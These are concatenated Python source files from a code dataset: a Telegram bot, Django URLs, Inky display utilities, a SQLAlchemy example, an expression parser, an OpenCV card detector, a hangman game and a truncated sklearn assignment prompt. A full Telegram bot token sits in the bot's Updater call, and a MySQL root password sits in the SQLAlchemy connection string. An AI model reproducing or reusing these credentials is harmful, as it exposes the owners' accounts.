Updater(token='262103726:AAGOwtH2gGcZTsbi2BL5OpueK5BbKJ0pFIY')\r\n dispatcher = updater.dispatcher\r\n\r\n dispatcher.add_handler(CommandHandler('start', start))\r\n dispatcher.add_handler(CommandHandler('help', send_help))\r\n dispatcher.add_handler(CommandHandler('points', get_points))\r\n dispatcher.add_handler(CommandHandler('addobj', add_objective, pass_args=True))\r\n dispatcher.add_handler(CommandHandler('cancel', cancel_objective))\r\n\r\n dispatcher.add_handler(CommandHandler('cheat', cheat))\r\n\r\n dispatcher.add_handler(MessageHandler([], message_handler))\r\n\r\n updater.start_polling()\r\n updater.idle()\r\n","sub_path":"Jacobs/JacobsBot.py","file_name":"JacobsBot.py","file_ext":"py","file_size_in_byte":13465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"502579836","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nimport coreapp.views\nimport coreapp.urls\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'ExpensesMonitor.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 'coreapp.views.index', name='index'),\n url(r'^login$', 'django.contrib.auth.views.login', name='login'),\n url(r'^register$', 'coreapp.views.register', name='register'),\n url(r'^about$', coreapp.views.about, name='about'),\n url(r'^contact$', coreapp.views.contact, name='contact'),\n url(r'^faq$', coreapp.views.faq, name='faq'),\n\n url(r'^user/', include(coreapp.urls, namespace='user')),\n url(r'^accounts/login/$', 'django.contrib.auth.views.login'),\n url(r'^accounts/logout$', 'django.contrib.auth.views.logout', {'next_page': '/'}),\n)\n","sub_path":"ExpensesMonitor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"103118076","text":"from PIL import ImageFont\r\nfrom font_fredoka_one import FredokaOne\r\n\r\n\r\ndef draw_text(display, draw, message, font_size=24, y_align=\"middle\"):\r\n \"\"\"Get yfinance ticker object from a symbol\r\n\r\n Args:\r\n display (Inky): Inky display object\r\n draw (ImageDraw): ImageDraw object\r\n message (str): Texr message to display\r\n font_size (int): Font size\r\n y_align (str): Y alignment of message: \"middle\", \"top\" or \"bottom\"\r\n Returns:\r\n draw (ImageDraw): Updated ImageDraw object\r\n \"\"\"\r\n font = ImageFont.truetype(FredokaOne, font_size)\r\n w, h = font.getsize(message)\r\n\r\n # Scale down font if the text is bigger than the screen\r\n if w > display.WIDTH:\r\n font_size = int(font_size * display.WIDTH / w)\r\n font = ImageFont.truetype(FredokaOne, font_size)\r\n w, h = font.getsize(message)\r\n\r\n x = (display.WIDTH / 2) - (w / 2)\r\n\r\n if y_align == \"middle\":\r\n y = (display.HEIGHT / 2) - (h / 2)\r\n elif y_align == \"top\":\r\n y = 0\r\n elif y_align == \"bottom\":\r\n y = display.HEIGHT - h\r\n else:\r\n raise Exception(\"y_align parameter not recognised\")\r\n\r\n draw.text((x, y), message, display.BLACK, font)\r\n return draw\r\n\r\n\r\ndef draw_simple_messages(\r\n display,\r\n draw,\r\n messages,\r\n font_sizes={\"top\": 24, \"middle\": 52, \"bottom\": 18},\r\n):\r\n \"\"\"Draw three text messages\r\n\r\n Args:\r\n display (Inky): Inky display object\r\n draw (ImageDraw): ImageDraw object\r\n messages (dict): messages with the keys \"middle\", \"top\" and \"bottom\"\r\n font_sizes (dict): Font sizes dict with the keys \"middle\", \"top\" and \"bottom\"\r\n Returns:\r\n draw (ImageDraw): Updated ImageDraw object\r\n \"\"\"\r\n for location, message in messages.items():\r\n draw = draw_text(\r\n display,\r\n draw,\r\n message=message,\r\n font_size=font_sizes[location],\r\n y_align=location,\r\n )\r\n return draw\r\n\r\n\r\ndef draw_graph_data(display, draw, data, simple_messages, graph_range):\r\n \"\"\"Draw graph mode data\r\n\r\n Args:\r\n display (Inky): Inky display object\r\n draw (ImageDraw): ImageDraw object\r\n data (DataFrame): DataFrame given by get_data\r\n simple_messages (dict): output of draw_simple_messages()\r\n Returns:\r\n draw (ImageDraw): Updated ImageDraw object\r\n \"\"\"\r\n # Display text\r\n message = f\"{simple_messages['top']}: {simple_messages['middle']}\"\r\n font = ImageFont.truetype(FredokaOne, 25)\r\n w, h = font.getsize(message)\r\n x = (display.WIDTH / 2) - (w / 2)\r\n draw.text((x, 0), message, display.BLACK, font)\r\n message = f\"{simple_messages['bottom']}\"\r\n font = ImageFont.truetype(FredokaOne, 15)\r\n w, h = font.getsize(message)\r\n x = (display.WIDTH / 2) - (w / 2)\r\n draw.text((x, 25), message, display.BLACK, font)\r\n\r\n # Display graph\r\n x_margin_right = 50\r\n\r\n y_margin_top = 50\r\n y_margin_bot = 5\r\n y_range = display.HEIGHT - y_margin_top - y_margin_bot\r\n\r\n price_data = list(data[\"close\"])[-graph_range:]\r\n max_price = round(max(price_data), 2)\r\n min_price = round(min(price_data), 2)\r\n\r\n x_list = []\r\n y_list = []\r\n\r\n # y: change scale from [max_price, max_price] to [0, display.HEIGHT]\r\n y_data = [\r\n (display.HEIGHT * (y - min_price)) / (max_price - min_price) for y in price_data\r\n ]\r\n for i in range(graph_range):\r\n x = i * (display.WIDTH - x_margin_right) / graph_range\r\n y = y_data[i]\r\n y = display.HEIGHT - y # 0 on bottom\r\n y = y / display.HEIGHT * y_range + y_margin_top # apply limited range (y_range)\r\n\r\n x_list.append(x)\r\n y_list.append(y)\r\n\r\n draw.line(list(zip(x_list, y_list)), fill=display.BLACK, width=2)\r\n\r\n # Display min price and max price on right side\r\n draw.text(\r\n (display.WIDTH - x_margin_right + 2, y_margin_top - 3),\r\n str(max_price),\r\n display.BLACK,\r\n ImageFont.truetype(FredokaOne, 15),\r\n )\r\n draw.text(\r\n (display.WIDTH - x_margin_right + 2, display.HEIGHT - 15),\r\n str(min_price),\r\n display.BLACK,\r\n ImageFont.truetype(FredokaOne, 15),\r\n )\r\n return draw\r\n","sub_path":"ticker/display_utils.py","file_name":"display_utils.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"418843672","text":"# 使用SQLAlchemy \n# ORM, 把关系数据库的表结构映射到对象上\nimport pymysql\n\nfrom sqlalchemy import Column, String, create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\nbase = declarative_base()\n\nclass User(base):\n __tablename__ = 'person'\n\n id = Column(String(20),primary_key=True)\n name = Column(String(20))\n\n # 一对多:\n # books = relationship('Book')\n\n# class Book(base):\n# __tablename__ = 'book'\n# id = Column(String(20), primary_key=True)\n# name = Column(String(20))\n# user_id = Column(String(20), ForeignKey('user.id'))\n# 外键\n\nengine = create_engine('mysql+pymysql://root:Zjf9437879228.@localhost:3306/test_py')\n# '数据库类型+数据库驱动名称://用户名:口令@机器地址:端口号/数据库名'\nDBSession = sessionmaker(bind=engine)\n\n# 查询\nsession = DBSession()\nuser = session.query(User).filter(User.id == '3').one()\nprint(user)\nprint('type:',type(user))\nprint('name:',user.name)\n# session.close()\n\n# 插入\nnew_user = User(id='4', name='Bob')\n\nsession.add(new_user)\nsession.commit()\nsession.close()","sub_path":"SQL/SQLAlchemy123.py","file_name":"SQLAlchemy123.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"306874128","text":"from Wpp.expr.Node import Node\nfrom Wpp.expr.operations import binOps, unOps, ternaryPrior, fnArgsPrior, squareBracketPrior\n\ndef scanLexems(lexems, pos, terminators, context):\n\t\"Анализ списка лексем. На выходе единственный узел и позиция последней использованной лекскмы\"\n\tstack = []\n\tstep = 1\n\twhile pos < len(lexems):\n\t\tvalue, lexemType, constType = lexems[pos]\n\t\t# Проверка на команду - завершитель\n\t\tif lexemType == 'cmd' and value in terminators:\n\t\t\tbreak\n\t\tpos += 1\n\t\tif stack and stack[-1].isSpecMinus(lexemType, constType):\n\t\t\t# Специальный случай - замена унарного минуса к числовой константе на отрицательное число \n\t\t\tstack[-1] = Node('arg', lexemType, '-'+value, constType, True)\n\t\telif lexemType == 'const' or lexemType == 'id':\n\t\t\tstack.append(Node('arg', lexemType, value, constType, True))\n\t\telif lexemType == 'cmd':\n\t\t\tif stack and stack[-1].bArgument:\n\t\t\t\tif value == '?':\n\t\t\t\t\tprior = ternaryPrior\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('ternar', lexemType, prior=prior)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\t\targ2, pos = scanLexems(lexems, pos, {':'}, context)\n\t\t\t\t\tpos += 1\n\t\t\t\t\topNode.args.append(arg2)\n\t\t\t\telif value == '(':\n\t\t\t\t\t# Вызов функции\n\t\t\t\t\tprior = fnArgsPrior\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('call', lexemType, prior=prior, bArgument=True)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\t\tif lexems[pos][0] == ')':\n\t\t\t\t\t\tpos += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\twhile True:\n\t\t\t\t\t\t\taNode, pos = scanLexems(lexems, pos, {',', ')'}, context)\n\t\t\t\t\t\t\ttermCmd, termType, termX = lexems[pos]\n\t\t\t\t\t\t\topNode.args.append(aNode)\n\t\t\t\t\t\t\tpos += 1\n\t\t\t\t\t\t\tif termCmd == ')':\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\telif value == '[':\n\t\t\t\t\tprior = squareBracketPrior\n\t\t\t\t\t# optimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('index', lexemType, prior=prior, bArgument=True)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\t\taNode, pos = scanLexems(lexems, pos, {']'}, context)\n\t\t\t\t\topNode.args.append(aNode)\n\t\t\t\t\tpos += 1\n\t\t\t\telse:\n\t\t\t\t\t# Бинарный оператор\n\t\t\t\t\tprior = binOps.get(value)\n\t\t\t\t\tif not prior:\n\t\t\t\t\t\tcontext.throwError('Invalid binary operation \"%s\"' % (value))\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('binop', lexemType, value, prior=prior)\n\t\t\t\t\topNode.args.append(stack.pop())\n\t\t\t\tstack.append(opNode)\n\t\t\telse:\n\t\t\t\t# Унарный оператор\n\t\t\t\tif value == '(':\n\t\t\t\t\t# Скобки для группировки операций\n\t\t\t\t\topNode, pos = scanLexems(lexems, pos, {')'}, context)\n\t\t\t\t\tpos += 1\n\t\t\t\telif value == '[':\n\t\t\t\t\t# Значение типа массива\n\t\t\t\t\topNode, pos = createArray(lexems, pos, context)\n\t\t\t\telse:\n\t\t\t\t\tprior = unOps.get(value)\n\t\t\t\t\tif not prior:\n\t\t\t\t\t\tcontext.throwError('Invalid unary operation ' + value)\n\t\t\t\t\toptimizeStack(stack, prior, context)\n\t\t\t\t\topNode = Node('unop', lexemType, value, prior=prior)\n\t\t\t\tstack.append(opNode)\n\tif pos == len(lexems):\n\t\tcontext.throwError('No end of expression found')\n\toptimizeStack(stack, 100, context)\n\tif len(stack) != 1:\n\t\t# Если узлы не сошлись в один, то это неправильное выражение. Типа x 1\n\t\tcontext.throwError('Invalid expression: [' + ', '.join([str(i) for i in stack])+']')\n\treturn (stack[0], pos)\n\ndef createArray(lexems, pos, context):\n\tvalue = Node('array', 'array', bArgument = True)\n\tdivider = ''\n\twhile divider != ']':\n\t\tnode, pos = scanLexems(lexems, pos, {',', ']'}, context)\n\t\tdivider, t, x = lexems[pos]\n\t\tvalue.args.append(node)\n\t\tpos += 1\n\treturn value, pos\n\ndef optimizeStack(stack, prior, context):\n\tif not stack:\n\t\treturn\n\n\twhile True:\n\t\tlast = stack.pop()\n\t\tif not last.bArgument:\n\t\t\tstack.append(last)\n\t\t\treturn\n\t\tif not stack:\n\t\t\tstack.append(last)\n\t\t\treturn\n\t\top = stack.pop()\n\t\tif op.bArgument:\n\t\t\tcontext.throwError('Expected operation instead of '+str(op))\n\t\tif op.prior > prior:\n\t\t\tstack.append(op)\n\t\t\tstack.append(last)\n\t\t\treturn\n\t\top.args.append(last)\n\t\top.bArgument = True\n\t\tstack.append(op)\n","sub_path":"src1/Wpp/expr/scanLexems.py","file_name":"scanLexems.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"173111121","text":"#\n# Based on: https://github.com/EdjeElectronics/OpenCV-Playing-Card-Detector\n#\nimport json\nimport os\n\nimport cv2\nimport numpy as np\n\nfrom poke_visor.classes.card_detector.poker_card_info import PokerCardInfo\nfrom poke_visor.classes.card_detector.train_ranks import TrainRanks\nfrom poke_visor.classes.card_detector.train_suits import TrainSuits\n# Adaptive threshold levels\nfrom poke_visor.enums.card_rank_enum import CardRank\nfrom poke_visor.enums.card_suit_enum import CardSuit\n\n# Constants #\n\nBKG_THRESH = 70\nCARD_THRESH = 30\n\n# Width and height of card corner, where rank and suit are\nCORNER_WIDTH = 64\nCORNER_HEIGHT = 160\n\n# Dimensions of rank train images\nRANK_WIDTH = 70\nRANK_HEIGHT = 125\n\n# Dimensions of suit train images\nSUIT_WIDTH = 70\nSUIT_HEIGHT = 100\n\nRANK_DIFF_MAX = 2000\nSUIT_DIFF_MAX = 700\n\nCARD_MAX_AREA = 240000\nCARD_MIN_AREA = 12500\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n\ndef _load_settings():\n global CARD_MAX_AREA, CARD_MIN_AREA\n\n if os.path.isfile(\"config.json\"):\n with open(\"config.json\", \"r\") as file:\n config_json = json.loads(file.read())\n if \"card-detector\" in config_json:\n settings = json.loads(file.read())[\"card-detector\"]\n CARD_MAX_AREA = settings[\"card-max-area\"]\n CARD_MIN_AREA = settings[\"card-min-area\"]\n\n\n_load_settings()\n\n\ndef load_ranks(filepath):\n \"\"\"Loads rank images from directory specified by filepath. Stores\n them in a list of Train_ranks objects.\"\"\"\n\n train_ranks = []\n\n for rank in CardRank:\n if rank == CardRank.unknown:\n continue\n\n train_ranks.append(TrainRanks())\n last = len(train_ranks) - 1\n train_ranks[last].rank = rank\n filename = str(rank.name) + \".jpg\"\n\n if not os.path.exists(filepath + filename):\n raise RuntimeError(f\"Card rank file not found : {filepath + filename}\")\n\n train_ranks[last].img = cv2.imread(filepath + filename, cv2.IMREAD_GRAYSCALE)\n\n return train_ranks\n\n\ndef load_suits(filepath):\n \"\"\"Loads suit images from directory specified by filepath. Stores\n them in a list of Train_suits objects.\"\"\"\n\n train_suits = []\n\n for suit in CardSuit:\n if suit == CardSuit.unknown:\n continue\n\n train_suits.append(TrainSuits())\n last = len(train_suits) - 1\n train_suits[last].suit = suit\n filename = str(suit.name) + \".jpg\"\n\n if not os.path.exists(filepath + filename):\n raise RuntimeError(f\"Card suit file not found : {filepath + filename}\")\n\n train_suits[last].img = cv2.imread(filepath + filename, cv2.IMREAD_GRAYSCALE)\n\n return train_suits\n\n\ndef preprocess_image(image):\n \"\"\"Returns a grayed, blurred, and adaptively thresholded camera image.\"\"\"\n\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(gray, (3, 3), 0)\n\n thresh = cv2.adaptiveThreshold(blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 5, 2)\n return thresh\n\n\ndef find_cards(thresh_image):\n \"\"\"Finds all card-sized contours in a thresholded camera image.\n Returns the number of cards, and a list of card contours sorted\n from largest to smallest.\"\"\"\n\n # Find contours and sort their indices by contour size\n cnts, hier = cv2.findContours(thresh_image, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n index_sort = sorted(range(len(cnts)), key=lambda i_: cv2.contourArea(cnts[i_]), reverse=True)\n\n # If there are no contours, do nothing\n if len(cnts) == 0:\n return [], []\n\n # Otherwise, initialize empty sorted contour and hierarchy lists\n cnts_sort = []\n hier_sort = []\n cnt_is_card = np.zeros(len(cnts), dtype=int)\n\n # Fill empty lists with sorted contour and sorted hierarchy. Now,\n # the indices of the contour list still correspond with those of\n # the hierarchy list. The hierarchy array can be used to check if\n # the contours have parents or not.\n for i in index_sort:\n cnts_sort.append(cnts[i])\n hier_sort.append(hier[0][i])\n\n # Determine which of the contours are cards by applying the\n # following criteria: 1) Smaller area than the maximum card size,\n # 2), bigger area than the minimum card size, 3) have no parents,\n # and 4) have four corners\n\n for i in range(len(cnts_sort)):\n size = cv2.contourArea(cnts_sort[i])\n peri = cv2.arcLength(cnts_sort[i], True)\n approx = cv2.approxPolyDP(cnts_sort[i], 0.01 * peri, True)\n\n if CARD_MAX_AREA > size > CARD_MIN_AREA and len(approx) == 4:\n cnt_is_card[i] = 1\n\n return cnts_sort, cnt_is_card\n\n\ndef preprocess_card(contour, image) -> PokerCardInfo:\n \"\"\"Uses contour to find information about the poker card. Isolates rank\n and suit images from the card.\"\"\"\n\n # Initialize new card_info object\n card_info = PokerCardInfo()\n\n card_info.contour = contour\n\n # Find perimeter of card and use it to approximate corner points\n peri = cv2.arcLength(contour, True)\n approx = cv2.approxPolyDP(contour, 0.01 * peri, True)\n pts = np.float32(approx)\n\n # Find width and height of card\"s bounding rectangle\n x, y, w, h = cv2.boundingRect(contour)\n card_info.width, card_info.height = w, h\n\n # Find center point of card by taking x and y average of the four corners.\n average = np.sum(pts, axis=0) / len(pts)\n cent_x = int(average[0][0])\n cent_y = int(average[0][1])\n card_info.center = [cent_x, cent_y]\n\n # Warp card into 256x360 flattened image using perspective transform\n # noinspection PyTypeChecker\n warp = cv2.resize(_flattener(image, pts, w, h), (256, 360))\n\n # Grab corner of warped card image and do a 4x zoom\n corner = warp[0:CORNER_HEIGHT, 0:CORNER_WIDTH]\n corner_zoom = cv2.resize(corner, (0, 0), fx=4, fy=4)\n\n # Sample known white pixel intensity to determine good threshold level\n white_level = corner_zoom[corner_zoom.shape[0] - 1, int((CORNER_WIDTH * 4) / 2)]\n thresh_level = white_level - CARD_THRESH\n if thresh_level <= 0:\n thresh_level = 1\n _, poker_thresh = cv2.threshold(corner_zoom, thresh_level, 255, cv2.THRESH_BINARY_INV)\n\n # Split in to top and bottom half (top shows rank, bottom shows suit)\n rank = poker_thresh[0:round(CORNER_HEIGHT * 2), 0:CORNER_WIDTH * 4]\n suit = poker_thresh[round(CORNER_HEIGHT * 2):CORNER_HEIGHT * 4, 0:CORNER_WIDTH * 4]\n\n # Find rank contour and bounding rectangle, isolate and find largest contour\n rank_cnts, hier = cv2.findContours(rank, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n rank_cnts = sorted(rank_cnts, key=cv2.contourArea, reverse=True)\n\n # Find bounding rectangle for largest contour, use it to resize poker rank\n # image to match dimensions of the train rank image\n if len(rank_cnts) != 0:\n x1, y1, w1, h1 = cv2.boundingRect(rank_cnts[0])\n rank_roi = rank[y1:y1 + h1, x1:x1 + w1]\n rank_sized = cv2.resize(rank_roi, (RANK_WIDTH, RANK_HEIGHT), 0, 0)\n card_info.rank_img = rank_sized\n\n # Find suit contour and bounding rectangle, isolate and find largest contour\n suit_cnts, hier = cv2.findContours(suit, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n suit_cnts = sorted(suit_cnts, key=cv2.contourArea, reverse=True)\n\n # Find bounding rectangle for largest contour, use it to resize poker suit\n # image to match dimensions of the train suit image\n if len(suit_cnts) != 0:\n x2, y2, w2, h2 = cv2.boundingRect(suit_cnts[0])\n suit_roi = suit[y2:y2 + h2, x2:x2 + w2]\n suit_sized = cv2.resize(suit_roi, (SUIT_WIDTH, SUIT_HEIGHT), 0, 0)\n card_info.suit_img = suit_sized\n\n return card_info\n\n\ndef match_card(card, train_ranks, train_suits):\n \"\"\"Finds best rank and suit matches for the poker card. Differences\n the poker card rank and suit images with the train rank and suit images.\n The best match is the rank or suit image that has the least difference.\"\"\"\n\n best_rank_match_diff = 10000\n best_suit_match_diff = 10000\n best_rank_match_name = CardRank.unknown\n best_suit_match_name = CardSuit.unknown\n best_rank_name = CardRank.unknown\n best_suit_name = CardSuit.unknown\n\n # If no contours were found in poker card in preprocess_card function,\n # the img size is zero, so skip the differencing process\n # (card will be left as unknown)\n if (len(card.rank_img) != 0) and (len(card.suit_img) != 0):\n\n # Difference the poker card rank image from each of the train rank images,\n # and store the result with the least difference\n for t_rank in train_ranks:\n\n diff_img = cv2.absdiff(card.rank_img, t_rank.img)\n rank_diff = int(np.sum(diff_img) / 255)\n\n if rank_diff < best_rank_match_diff:\n best_rank_match_diff = rank_diff\n best_rank_name = t_rank.rank\n\n # Same process with suit images\n for t_suit in train_suits:\n\n diff_img = cv2.absdiff(card.suit_img, t_suit.img)\n suit_diff = int(np.sum(diff_img) / 255)\n\n if suit_diff < best_suit_match_diff:\n best_suit_match_diff = suit_diff\n best_suit_name = t_suit.suit\n\n # Combine best rank match and best suit match to get poker card\"s identity.\n # If the best matches have too high of a difference value, card identity\n # is still unknown\n if best_rank_match_diff < RANK_DIFF_MAX:\n best_rank_match_name = best_rank_name\n\n if best_suit_match_diff < SUIT_DIFF_MAX:\n best_suit_match_name = best_suit_name\n\n # Return the identity of the card and the quality of the suit and rank match\n return best_rank_match_name, best_suit_match_name, best_rank_match_diff, best_suit_match_diff\n\n\ndef draw_results(image, card):\n \"\"\"Draw the card name and contour on the camera image.\"\"\"\n\n x = card.center[0]\n y = card.center[1]\n\n rank_name = card.best_rank_match\n suit_name = card.best_suit_match\n\n # Draw card name twice, so letters have black outline\n cv2.putText(image, (rank_name.name + \" of\"), (x - 60, y - 10), font, 1, (0, 0, 0), 3, cv2.LINE_AA)\n cv2.putText(image, (rank_name.name + \" of\"), (x - 60, y - 10), font, 1, (0, 255, 0), 2, cv2.LINE_AA)\n\n cv2.putText(image, suit_name.name, (x - 60, y + 25), font, 1, (0, 0, 0), 3, cv2.LINE_AA)\n cv2.putText(image, suit_name.name, (x - 60, y + 25), font, 1, (0, 255, 0), 2, cv2.LINE_AA)\n\n return image\n\n\ndef _flattener(image, pts, w, h):\n \"\"\"Flattens an image of a card into a top-down 200x300 perspective.\n Returns the flattened, re-sized, grayed image.\n See www.pyimagesearch.com/2014/08/25/4-point-opencv-getperspective-transform-example/\"\"\"\n temp_rect = np.zeros((4, 2), dtype=\"float32\")\n\n s = np.sum(pts, axis=2)\n\n tl = pts[np.argmin(s)]\n br = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis=-1)\n tr = pts[np.argmin(diff)]\n bl = pts[np.argmax(diff)]\n\n # Need to create an array listing points in order of\n # [top left, top right, bottom right, bottom left]\n # before doing the perspective transform\n\n if w <= 0.8 * h: # If card is vertically oriented\n temp_rect[0] = tl\n temp_rect[1] = tr\n temp_rect[2] = br\n temp_rect[3] = bl\n\n if w >= 1.2 * h: # If card is horizontally oriented\n temp_rect[0] = bl\n temp_rect[1] = tl\n temp_rect[2] = tr\n temp_rect[3] = br\n\n # If the card is \"diamond\" oriented, a different algorithm\n # has to be used to identify which point is top left, top right\n # bottom left, and bottom right.\n\n if 0.8 * h < w < 1.2 * h: # If card is diamond oriented\n # If furthest left point is higher than furthest right point,\n # card is tilted to the left.\n if pts[1][0][1] <= pts[3][0][1]:\n # If card is titled to the left, approxPolyDP returns points\n # in this order: top right, top left, bottom left, bottom right\n temp_rect[0] = pts[1][0] # Top left\n temp_rect[1] = pts[0][0] # Top right\n temp_rect[2] = pts[3][0] # Bottom right\n temp_rect[3] = pts[2][0] # Bottom left\n\n # If furthest left point is lower than furthest right point,\n # card is tilted to the right\n if pts[1][0][1] > pts[3][0][1]:\n # If card is titled to the right, approxPolyDP returns points\n # in this order: top left, bottom left, bottom right, top right\n temp_rect[0] = pts[0][0] # Top left\n temp_rect[1] = pts[3][0] # Top right\n temp_rect[2] = pts[2][0] # Bottom right\n temp_rect[3] = pts[1][0] # Bottom left\n\n max_width = 200\n max_height = 300\n\n # Create destination array, calculate perspective transform matrix,\n # and warp card image\n dst = np.array([[0, 0], [max_width - 1, 0], [max_width - 1, max_height - 1], [0, max_height - 1]], np.float32)\n m = cv2.getPerspectiveTransform(temp_rect, dst)\n warp = cv2.warpPerspective(image, m, (max_width, max_height))\n warp = cv2.cvtColor(warp, cv2.COLOR_BGR2GRAY)\n\n return warp\n","sub_path":"application/poke_visor/logic/card_detector/card_detection_functions.py","file_name":"card_detection_functions.py","file_ext":"py","file_size_in_byte":13006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"66896693","text":"import random\nimport sys\nimport os\n\nclass HangMan:\n\n def __init__(self):\n self.capitals = []\n self.cap_name_output = []\n self.not_in_word = []\n self.cap_name = []\n self.choice = ' '\n self.type_letter = ' '\n self.type_word = ' '\n\n\n # importing capital cities from file, storing them in list,\n # choosing one of them radomly\n def make_capitals(self):\n with open(\"capitals.txt\", \"r\") as capital:\n for item in capital:\n self.capitals.append(item.replace('\\n', ''))\n capital.close()\n self.cap_name = list(random.choice(self.capitals))\n\n\n # filling another list with dashes and * if there is a space\n def make_dashes(self):\n for letter in self.cap_name:\n for n, i in enumerate(self.cap_name):\n if i == ' ':\n self.cap_name[n] = '*'\n if letter == '*':\n self.cap_name_output.append('*')\n else:\n self.cap_name_output.append('_ ')\n\n\n # chcecking player's lifes, close program when lifes reache\n def end_game(self,lifes):\n if lifes == 0:\n print('\\033[91m' + 'GAME OVER!' + '\\033[0m')\n sys.exit()\n\n\n #checking user input if it is letter or space\n def check_letter(self):\n while not len(self.type_letter) == 1:\n print('You can type only letters and spaces. Try again.')\n self.type_letter = input('Type letter: ').upper()\n while not self.type_letter.isalpha():\n print('You can type only letters and spaces. Try again.')\n self.type_letter = input('Type letter: ').upper()\n\n\n def letter(self,lifes):\n if self.not_in_word != []:\n print(\"Used letters: \" + ', '.join(self.not_in_word))\n if '_ ' in self.cap_name_output:\n self.type_letter = input('Type letter: ').upper()\n self.check_letter()\n if self.type_letter not in self.cap_name:\n self.not_in_word.append(self.type_letter)\n print('\\n' + '\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n self.game(lifes - 1)\n for letter, i in enumerate(self.cap_name):\n if i == self.type_letter:\n self.cap_name_output[letter] = self.type_letter\n print('\\n' + '\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n if '_ ' not in self.cap_name_output:\n print('\\033[92m' + 'YOU WON!' + '\\033[0m')\n sys.exit()\n self.game(lifes)\n\n\n # checking if in entered word(s) is space and changing spaces for *\n # comparing typed word with capital name\n def word(self,lifes):\n self.type_word = list(input('Type word: ').upper())\n if ' ' in self.type_word:\n for n, i in enumerate(self.type_word):\n if i == ' ':\n self.type_word[n] = '*'\n if self.type_word == self.cap_name:\n print('\\033[92m' + 'YOU WON!' + '\\033[0m')\n sys.exit()\n else:\n self.game(lifes - 1)\n\n\n # asking user for input, runs appropriate function depending on input\n def game(self,lifes):\n print('\\nYou have', lifes, ' lifes.')\n self.end_game(lifes)\n self.choice = input('Would You like to guess a letter or whole word(s)? ').lower()\n if self.choice == 'letter' or self.choice == 'l':\n self.letter(lifes)\n elif self.choice == 'word' or self.choice == 'w':\n print('\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n self.word(lifes)\n else:\n print('You can chose only between letter or word, type again!')\n self.game(lifes)\n\n\n # user can set difficulty level, to determine number of lifes\n def levels(self):\n input_level = input('Do you chose EASY, MEDIUM or HARD level? ').lower()\n print('\\n' + '\\033[1m' + ''.join(self.cap_name_output) + '\\033[0m' + '\\n')\n if input_level == 'easy' or input_level == 'e':\n self.game(15)\n elif input_level == 'medium' or input_level == 'm':\n self.game(10)\n elif input_level == 'hard' or input_level == 'h':\n self.game(5)\n else:\n print('There no such level, type again!')\n self.levels()\n\n # star game function\n def start_game(self):\n start = input('Do sure you want start the game and save The World? There will be no return...(enter \"yes\" to continue) ').lower()\n if start == 'yes' or start == 'y':\n self.levels()\n else:\n sys.exit()\n\n def main(self):\n os.system('clear')\n print('\\033[93m' + 'Evil ' + '\\033[91m' + 'SKYNET' + '\\033[93m' + ''' is trying to take control over the world.\n Guess a names of European capital that are his targets and safe the world!\\n''' + '\\033[0m')\n self.make_capitals()\n self.make_dashes()\n self.start_game()\n self.levels\n\nnew_game = HangMan()\nnew_game.main()\n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"421991313","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nDownload and install sklearn on your computer (e.g. download the Anaconda distribution) or \nuse a Jupyter notebook on Google Colab (free).\n Download the sample dataset assigData4.csv. This file has 1200 positive and 6000 negative samples. Each sample 215 features \n (assume the first feature is “feature 1” below). The final value on each line of the file is the class (1 = positive, \n 0 = negative) of that sample. These data represent features extracted from genomic windows that do (positive) and do not (negative) \n correspond to microRNA. Use Weka to do the following:\na) Data visualization:\ni. Load the data (note that there is no header line and that the ‘last’ attribute should be considered as the nominal class).\n Suggest you use the pandas library for this.\nii. Plot the distribution of feature 15 for the two classes on a single histogram. The seaborn library may be useful here.\niii. Plot a scatterplot illustrating the correlation between features 3 and 8, colouring the data by class. Again,\n the seaborn library is useful here.\nb) Preprocessing: sklearn implements several filter type (i.e. not wrapper type) feature selection methods.\ni. Describe the SelectKBest approach using the chi metric. (~50 words, don’t just copy)\nii. Run a different filter-type feature selection approach on your data (i.e. other than SelectKBest with chi).\niii.\n i. Briefly 